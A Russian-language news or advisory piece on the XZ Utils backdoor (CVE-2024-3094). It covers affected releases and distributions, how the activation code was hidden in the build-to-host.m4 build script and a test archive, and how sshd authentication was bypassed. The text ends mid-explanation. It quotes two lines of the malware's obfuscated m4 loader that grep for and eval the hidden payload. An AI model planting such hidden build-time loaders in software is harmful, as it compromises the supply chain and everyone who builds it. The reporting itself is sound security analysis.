В пакете XZ Utils, включающем библиотеку liblzma и утилиты для работы со сжатыми данными в формате “.xz”, выявлен бэкдор (CVE-2024-3094), позволяющий перехватывать и модифицировать данные, обрабатываемые приложениями, связанными с библиотекой liblzma. Основной целью бэкдора является сервер OpenSSH, в котором используется liblzma. Связывание sshd с уязвимой библиотекой позволяет злоумышленникам получить доступ к SSH-серверу без аутентификации.
Бэкдор присутствовал в официальных выпусках 5.6.0 и 5.6.1, опубликованных 24 февраля и 9 марта, которые успели попасть в состав некоторых дистрибутивов и репозиториев, например, Gentoo, Arch Linux, Debian sid/unstable, Fedora Rawhide, openSUSE factory, Alpine edge, Solus, NixOS unstable, OpenIndiana, OpenMandriva rolling, pkgsrc current, Slackware current, Manjaro testing. Каким образом злоумышленникам удалось получить доступ к инфраструктуре проекта xz пока не выяснено. Так же пока не ясно как много пользователей и проектов были скомпрометированы в результате действия бэкдора.
Код активации бэкдора был спрятан в m4-сценарии build-to-host.m4, используемом инструментарием automake при сборке. При сборке в ходе выполнения запутанных обфусцированных операций на основе одного из архивов (bad-3-corrupt_lzma2.xz), применяемых для тестирования корректности работы, формировался объектный файл с вредоносным кодом, который включался в состав библиотеки liblzma и изменял логику работы некоторых её функций. Указанные файлы входили в состав tar-архивов релизов, но отсутствовали в репозитории.
При использовании liblzma в приложениях вредоносные изменения могли использоваться для перехвата или модификации данных, а также для влияния на работу приложений, таких как sshd. В частности, вредоносный код подменял функцию RSA_public_decrypt для обхода процесса аутентификации в sshd.
В частности, в файле m4/build-to-host.m4 использовались конструкции
gl_am_configmake=’grep -aErls “#{4}[[:alnum:]]{5}#{4}$” $srcdir/ 2>/dev/null’
… gl_[$1]_config=’sed “rn” $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null’
В первой конструкции операция grep находила файл tests/files/bad-3-corrupt_lzma2.xz, при распаковке которого формировался сценарий: